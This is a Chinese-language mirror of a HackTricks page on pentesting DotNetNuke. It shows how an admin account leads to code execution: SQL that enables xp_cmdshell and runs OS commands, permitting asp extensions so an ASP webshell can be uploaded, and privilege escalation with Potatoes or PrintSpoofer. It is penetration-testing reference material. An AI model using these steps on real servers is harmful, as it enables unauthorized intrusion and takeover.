mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 16:10:54 +00:00
3.3 KiB
3.3 KiB
DotNetNuke (DNN)
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
- 您在网络安全公司工作吗? 想要在HackTricks中看到您的公司广告? 或者想要访问PEASS的最新版本或下载PDF格式的HackTricks? 请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入 💬 Discord群组 或 电报群组 或 关注我的Twitter 🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。
DotNetNuke (DNN)
如果以管理员身份登录DNN,很容易获得RCE。
RCE
通过SQL
在**设置
页面下可以访问SQL控制台,您可以在那里启用xp_cmdshell
并运行操作系统命令**。
使用以下代码行来启用**xp_cmdshell
**:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
然后,按下**"运行脚本"**来运行这些 SQL 语句。
然后,使用类似以下内容来运行操作系统命令:
xp_cmdshell 'whoami'
通过 ASP webshell
在 Settings -> Security -> More -> More Security Settings
下,您可以在 Allowable File Extensions
下添加新的允许的扩展名,然后点击 Save
按钮。
添加 asp
或 aspx
,然后在 /admin/file-management
上传一个名为 shell.asp
的 asp webshell 。
然后访问 /Portals/0/shell.asp
来访问您的 webshell。
提权
您可以使用 Potatoes 或 PrintSpoofer 等工具来提升权限。
从零开始学习 AWS 黑客技术 htARTE (HackTricks AWS Red Team Expert)!
- 您在一家 网络安全公司 工作吗? 想要看到您的 公司在 HackTricks 中被宣传? 或者您想要访问 PEASS 的最新版本或下载 HackTricks 的 PDF 版本? 请查看 SUBSCRIPTION PLANS!
- 探索 PEASS Family,我们的独家 NFTs
- 获取 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或 电报群组 或 关注 我的 Twitter 🐦@carlospolopm.
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。